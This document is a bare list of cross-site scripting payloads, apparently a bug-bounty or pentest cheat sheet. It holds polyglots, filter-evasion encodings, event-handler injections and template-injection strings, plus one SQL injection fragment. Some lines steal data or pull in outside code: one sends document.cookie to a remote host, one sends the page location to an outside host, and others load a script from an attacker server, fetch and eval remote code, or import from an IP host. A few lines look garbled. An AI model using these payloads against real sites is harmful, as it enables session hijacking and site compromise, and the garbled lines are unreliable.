javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
<svg/onload='fetch("//host/a").then(r=>r.text().then(t=>eval(t)))'>
<script src=14.rs>
<input type="hidden" accesskey="X" onclick="alert(1)">
#"><img src=/ onerror=alert(2)>
-(confirm)(document.domain)//
; alert(1);//
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg onload=alert(1)>
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />(
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<label id=x tabindex=1 onfocus=alert(1)></label>
<time onfocus=alert(1) autofocus tabindex=1>
<a2 onfocus=alert(1) autofocus tabindex=1>
<label onfocus=alert(1) autofocus tabindex=1>
<shadow onfocus=alert(1) autofocus tabindex=1>
<input autofocus onfocus=alert(1)>
<xss autofocus tabindex=1 onfocusin=alert(1)></xss>
<svg><path><animateMotion onbegin=alert(1) dur="1s" repeatCount="1">
<input type=image src=1 onerror=alert(1)>
</a onmousemove=alert(1)>
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<svg onload=alert%26%230000000040"1")>
%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(/xss/)
1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e
%3Cscript%3Ealert(`xss`)%3C/script%3E
"><a href=jav&#x0D;ascript&colon;top[8680439..toString(30)](document.domain)>Click</a>
><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
<svg>on%20onload%3D(“XSS”)(document.domain)<%2Fsvg>
<img src onerror=%26emsp;prompt`${document.domain}`>
testtest”+onmouseover%3D”alert%26%230000000040%3Bdocument[cookie])
dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi
javas%09cript:ghi=%27)%3E%27,you=%27(top%5B%22docum%22%2B%22ent%22%5D.cookie%27;HTMLElement%5B%27inne%27%2B%27rHTML%27%5D=%27%3CSvg/OnLoad=alert%27%2Brob%2Beco;//
"&gt;&lt;Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))&gt;
<=script>=alert("hacked")<=/scirpt>=
<SvG><set%0Aonbegin%0A=%0aa=confirm;a%28%60xss%60)/x>
javascript%3Avar%20a%3D%22ale%22%3Bvar%20b%3D%22rt%22%3Bvar%20c%3D%22%28%29%22%3BdecodeURI%28%22%26lt%3Bbutton%20popovertarget%3Dx%26gt%3BClick%20me%26lt%3B%2Fbutton%26gt%3B%26lt%3Bhvita%20onbeforetoggle%3D%22%2Ba%2Bb%2Bc%2B%22%20popover%20id%3Dx%26gt%3BHvita%26lt%3B%2Fhvita%26gt%3B%22%29
&amp;#60;script&amp;#62;alert(1)&amp;#60;/script&amp;#62;
&lt;dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt%2Ca(origin)%20x&gt;
&lt;dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x&gt;
&lt;img src=x onerror=alert(1)&gt;.crt
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt
&gt;+src+onerror=confirm&amp;lpar;1&amp;rpar;&lt;
"></textarea><ScRiPt>prompt(1)</ScRiPt// "><iframe/onload=alert(1)// ”/>&_lt;_script>alert(1)&_lt;/scr_ipt&gt”/>
«input»; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"};
«input»; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"};
<x onauxclick=a=alert,a(domain)>click
'x'%2520onclick='confirm%601%60'
%0A%0d+select+user+from+dual+%0A%0D
%3Chtml%0aonmouseOver%0a=%0a(prompt)``//
image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>
?url="onm<>ouseover="ale<>rt(1)
document.write(atob('PGltZyBzcmM9aHR0cDovL2xvY2FsaG9zdDo4MDkvcD89') + btoa(document.cookie) + '>')
window[document.body.innerText.charAt(document.body.innerText.indexOf('a'))+'lert'](1)
<img src=something onauxclick="new Function `al\ert\`xss\``">
`payload´; %3Cimg src='null' onerror=alert('spyerror')%3E
<details onauxclick=confirm`xss`></details>
<style>@keyframes a{}b{animation:a;}</style> <b/onanimationstart=prompt`${document.domain}&#x60;>
<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click
/<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
/<svg%0Aonauxclick=0;[1].some(confirm)//
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
<svg%0Aonauxclick=0;[1].some(confirm)//
(xss"><!--><svg/onload=alert(document.domain)>)
<form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));//
"<> au<>tof<>ocus o<>nfo<>cus=<>al<>ert<>(1<>)
" onauxclick=confirm`xss` "
<svg onauxclick='a=alert;b=document;a(b.domain)'>
%22onauxclick=alert`xss`+a
<x/onclick=globalThis&lsqb;\u0070r\u006f+mpt]&lt;)>clickme
<xhzeem attr=" --- x="=='='onmouseover=confirm`xhzeem` style="display:block;width:1000px;height:1000px;background:red"> --- ">
"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//
"><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)
<img%09'%0asrc='%5c%0d%7c'%00=''onerror=%0d%09%0a%60%60.sup(eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==')))>
??"><img/src/onerror=alert(document.domain)>
<a/+/OnMoUsEOVEr+=+(confirm)(document.domain)>
<sVg %00%00%00//onsite ONloAd=\u0061\u006C\u0065\u0072\u0074`/AmoloHT/`//>
parameter=<svg/&parameter=onload=alert()>
<svg onload=alert&#0000000040"1")>
<a data-orig-ref="
alert(1)" data-orig-proto="javascript" href="javascript://
alert(1)">clickme</a>
“autofocus onclick=&#97;lert()
“autofocus onFocUs=find(l\u{6F}cati\u{6F}n=`j&Tab;avascr&NewLine;ipt&colon;al&Tab;ert()`)
<img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);">
</pre><!-%00-><svg/%0D%0A%0D%0A/Id="a"/TABindex="1"/onload="\u0061lert(1);">
<script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1…)"></script>
%27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<img src=x:alert(alt) onerror=eval(src) alt='spyerror'>
"></tag><svg onload=alert(spyerror)>
<iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=></iframe>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
[" <style>@KeyFrames z{</style><div style=animation-name:z onanimationend=&#97&#108&#101&#114&#116&grave;1&grave;> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E "</script> "]
<!<script>alert(1)</script> “
<details open ontoggle='self["ale"%2b"rt"]&lpar;document&period;domain&rpar;'>
<svg/onload=%26nbsp;alert`bohdan`+
%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E
<iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
</Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt>
</> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </>
/* <audio src=1 onloadstart=alert&lpar;1&rpar;//> */
<style>img{background-image:url('javascript:alert(1)')}</style>
<style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style>
"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'>
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
"<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert(“XSS”)>"
<details+/'on+/ontoggle=1^confirm(document.domain)+open//
<sVg/onfake="x=y"oNload=;1^(co\u006efirm)``^1//
<img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img>
"><sc<>ript><onxXxxXXxXXXxx=()%20autofoco%20onmouseover=alert("HEJAP ZAIRY AL-SHARIF")></scr<>ipt>
<!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
"><svg%20onload=alert%26%230000000040"mysanismine")>
%00"><img src=x onerror=alert`1`//
<iframe+/ON+onload=%20alert(/str0d/)>
"<a href=""/*"">*/)});function+__MobileAppList(){alert(1)}//>"
<h1/%6f%6e/oNclicK=alert``>XSS
<svg/%6f%6e/oNloaD=alert``>
<svg onpointerenter=jQuery.globalEval("al"+"ert(documen"+"t.cooki"+"e)");>
<img+src=x+on<!--ram-->error=ale<!--ram-->rt(1)>
"firstname":"<img src ='","lastname":"'onerror=print()>"
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
" on<embed>click="a=al<embed>ert,a(cookie)
%27%09);%0d%0a%09%09[1].find(alert)//
<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme
test",prompt%0A/*HelloWorld*/(document.domain)
/*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/)
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6
<ifram%0de src=jav%0dascript:alert(document.cookie)>
-setTimeout`prompt\u0028document.domain\u0029`-'
“><D3V%0aONPoiNtERENTEr%0d=%0d[document.cookie].find(confirm)%0dx>
“><sVg/OnLuFy=”X=y”oNloaD=;1^confirm(1)>/“^1//
"><input/onauxclick="[1].map(prompt)">
x" onerror=alert('Qusai") x="
x%22%20onerror%3Dalert%28%27Qusai%22%29%20x%3D%22
//*><ScRipt>alert(/XSS/)</ScriPT>
"/><body onpageshow-prompt`assassin`//
<sc%00ript/test='asdf'>alert/**/(1)</script>
%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E
%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT%253E
">Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)"><<"
Enter_Mouse_Pointer_Here_to_get_XSS<P/onpointerenter="alert(1)">
<details open ontoggle="{alert`1`}"></details>
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
1'"><img/src/onerror=.1|alert``>
a<%00meta name="i" HTTP-EQUIV="refresh" CONTENT="0;url=data:text/h%00tml;base64,PHNjcmlwdD5hbGVydCgiT1BFTkJVR0JPVU5UWSIpOzwvc2NyaXB0Pg==">
">a<marquee onstart='constructor.constructor(atob("ywxlcnqoj09qru5cvudct1vovfknkq"))()'></marquee>
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
?"></script><base%20c%3D=href%3Dhttps:\targetsite>
?><a/\test=?%26quot;x%26quot;?href=?%01javascript:/*%b1*/;location.assign(?//hackerone.com/stealthy?x=?+location)?>Click
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
%3balert`1`%3b
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
<script>Object.prototype.BOOMR = 1;
>%0D%0A%0D%0A<x '=foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
>'><details/open/ontoggle=confirm('XSS')>
<input id=?a?value=?global?><input id=?b?value=?E?><input ?id=?c?value=?val?><input id=?d?value=?aler?><input id=?e?value=?t(documen?><input id=?f?value=?t.domain)?><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
?><img src=1 onmouseleave=print()>
<a?/onclick=(confirm)(document.cookie)>Click Here!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23?000000028;document.domain)>
<x/onclick=globalThis&lsqb;?\u0070r\u006f?+?mpt?]&lt;)>clickme
test?,prompt%0A/*HelloWorld*/(document.domain)
<a href=ja%26Tab%3bvasc%26Tab%3bript:prompt`1`>pwn</a>
<a href=javas&#99;ript:alert(1)>
<img/src="x"/onerror="prom\u0070t&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;">
"><h2 id="Iamheading"onmouseover="confirm(1)">
<a x href=javascript%26%23x3A%3Bconfirm(1)>a</a>
%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527XSS%2520here%2521%2527%2529%253C%252Fscript%253E
<sCRipT>alert(1)</sCRiPt>
<script>%0d%0aalert(1)</script>
<scr<script>ipt>alert(1);</scr</script>ipt>
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:alert&lpar;1&rpar;">
<svg•onload=alert(1)>
?><img src=x onmouseleave=print()>
><img src=x onmouseleave=print()>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<style><img src="</style><img src=x "><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
\u0065\u0076\u0061\u006C('ablolzers'['replace']("b","l")['replace']("lolzers","ert"))`1`
s = '"><script>alert(1)</script>' print 'eval(String.fromCharCode('+",".join([str(ord(o)) for o in s])+'))'
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
eeee<%2fscript><script>prompt(/XSS/.source)<%2fscript>yyyy
sg7cx"%20onerror%3d"confirm(document.domain)"gd67e
src=x:alert(alt) alt=3117
<scronerror=ipt>prompt(document.domain)</scronerror=ipt>
window["ev".concat("al")](String.fromCharCode(97,108,101,114,116,40,49,41));
<brute+onbeforescriptexecute=a=alert,a(1%26%23x29>
<svg><script xlink:href="{ASCII}data:,alert(1)"></script></svg>
<marquee/onstart=c=String.fromCharCode;confirm(c(47)+c(88)+c(83)+c(83)+c(47))>
"><input type="submit" formaction="javascript&colon;this&lsqb;'a'&plus;'lert'&rsqb;`1`"
<p style="height:100px" onwheel="self['al'+'ert'](self['ev'+'al']('docu'+'ment.coo'+'kie'))"></p>
<video autoplay onplay=alert`1` src=//w3schools.com/tags/movie.mp4>
<input type=search onsearch="location='data:text/html;\x62\x61\x73\x65\x36\x34,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='">
<input onf%0Aocus=alert(1) autofocus/
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<marquee loop=1 width=0 onfinish=prompt(1)>1</marquee>
?url="onm<>ouseover="ale<>rt(0)
"onm<>ouseover="ale<>rt(0)
<!<script>alert(document.domain)</script>
<!<script>confirm(1)</script>
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme
eval('al'+'ert'+'(12)');//
<iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>
<iframe src="java sc ript:al ert()"></iframe>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<svg onload=prompt%26%23x000000028;document.domain)>
- xss"></a><input value="Type anything"onbeforeinput="prompt%26lpar%3Bdocument.domain%26rpar%3B"><!--
><tag onxxxx=alert(1)>
><tag onxxxx="'a'|alert(1)">
<iframe name="<svg/onload=alert(23)>" src="http://example[.]com/x.php?age=23;%0adocument.body.innerHTML=name//">
23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
<lol/onauxclick=[0].some(alert)>rightclickhere
<iframe/src='%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A:prompt`1`'>
XSS"%0D<body='X' onmouseover=setInterval`alert\x28&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;\x29`//
%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick
"/*'/*`/*--><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
//comment%0a%0dalert(0);
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
<!<script>alert(4)</script>
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>
<marquee loop=1 width=0 onfinish=alert`1`>XSS</marquee>
Tarun~<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-tarun/&rpar;">XXXXX</a>
onload=\"a='alert()';d='XSS ';b='t(d)';c=a+b;console.log(eval(c));
constructor.constructor('alert(1)')()
#constructor.constructor('alert(1)')()
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//
';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//
';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
';this['\141\154\145\162\164']('\130\123\123');//
';top['\141\154\145\162\164']('\130\123\123');//
';frames['\141\154\145\162\164']('\130\123\123');//
';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
';window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
';self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]]);//
<img src=validimage.png onloadstart=alert(1)>
<svg/>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
XSS_HERE_%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%3cscript%3ealert%281%29%3b%3c%2fscript%3e
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
<svg/>
/%2527)%253B%2520alert(document.cookies)%253B%252F%252F
al\u0065rt(1)
marquee loop=1 width=0 onfinish=pr\u006fmpt(document.cookie)>Y000</marquee>
<svg%09%0a%0b%0c%0d%a0%00%20onload=alert (1)>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
<svg onload=alert("")>
$ <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? ------
<img src=1 onerror="a:b:c:d:alert(1)">
<svg onx=() onload=(confirm)(1)>
<img src onerror=confirm(1)>
&gt;+src+onerror=confirm&lpar;1&rpar;&lt;
<iframe src=data:text/html,<iframe src="data:text/html;base64,PD8+PD8+TT9MSz9KSyNAJDpMQCNKXkBePHNjcmlwdD5hbGVydCgnQml0QmFyZyA6KScpOzwvc2NyaXB0Pgo=">
<a href=javas%26#99;ript:prompt%26#x28document.domain)>xss
<script/%00%00v%00%00>document.location.href=location.hash.slice(1)</script>#javascript:alert(document.cookie)
<script> http://window.name=`<img src=x onerror=alert(top.document.domain)>` location=`https://domain/?xss=<iframe src=javascript:src=http://top.name>x</iframe>` </script>
<svg/OnLoad="`${prompt``}`">
%3Cx/Onpointerrawupdate=confirm%26lpar;)%3Exxxxx
%60%2balert/**/(1)%2b%60
tarun"><x/onafterscriptexecute=confirm%26lpar;)//
{{constructor.constructor('eval(atob(\'amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5jb29raWUp\'))')()}}
<xssBypass/onpointermove=(confirm)(1)>MoveMouseHere
<object/data=javascript:alert()>
<a/href="javascript%0A%0D:alert()">
-(a=alert,b="_Y000!_",[b].find(a))-'
-alert(1)-'
<marquee loop=1 onfinish=alert( )>x
Javascript://%E2%80%A9alert(618)
~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"
for(t?c.outerHTmL=o:i=o=;i++<1024;o+=`<code onclick=this.innerHTmL=${M(i)?*:n||’·’}>#</code>${i%64?:<p>}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
<svg onload='new Function`["_Y000!_"].find(al\u0065rt)`'>
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
<svg onload=&#97&#108&#101&#114&#116(1)>
vbscript:msgbox("XSS")
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
"><details/open/ontoggle=prompt("/test/")>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
%3Cscript%3Efor((TESTXSS)in(self))eval(TESTXSS)(`${`TESTXSS`}`)%3C/script%3E
img{background-image:url('javascript:alert()')}
<body/onload=&lt;!--&gt;&#10alert(1)>
<IMG SRC=”javascript:alert(XSS)”
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
<span/onmouseover=confirm(1)>xss
<a onmouseover%3D"alert(1)">xss
'?prompt`1`?'
"])},alert(1));(function xss() {//
""});});});alert(1);$('a').each(function(i){$(this).click(function(event){x({y
"}]}';alert(1);{{'
11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1
\');confirm(1);//
x");$=alert, $(1);//
'|alert(1)|'
'*prompt(1)*'
#'*prompt(1)*'
"><details/open/ontoggle=confirm("/xss_by_Y000!/")>
setInterval('ale'+'rt(10)');
XSS"onfocus="prompt(document.cookie)"autofocus="
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%253cimg%20onerror=alert(1)%20src=a%253e
%3cimg onerror=alert(1) src=a%3e
javascript:x='%27-alert(1)-%27';
%3Cscript%3Ealert(1)%3C/script%3E##1
(alert)(1)
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
<sVg oNloaD=write()>
\xE2\x81\x9Fjavascript:javascript:confirm(1)
#{{constructor.constructor(alert`1`)()}}
<a"/onclick=(confirm)()>Click Here!
<Img Src=On OnError=alert(1)>
<--`<img/src=` onerror=confirm``> --!>
<d3v/onauxclick=[2].some(confirm)>click
<a href="javascript:pro\u006dpt(document.cookie)">L1k0r</a>
<!<script>alert(1)</script>
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
</script><svg><script>alert(1)-%26apos%3B
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
javascript:%ef%bb%bfalert(XSS)
%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
javascript:{ alert`0` }
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
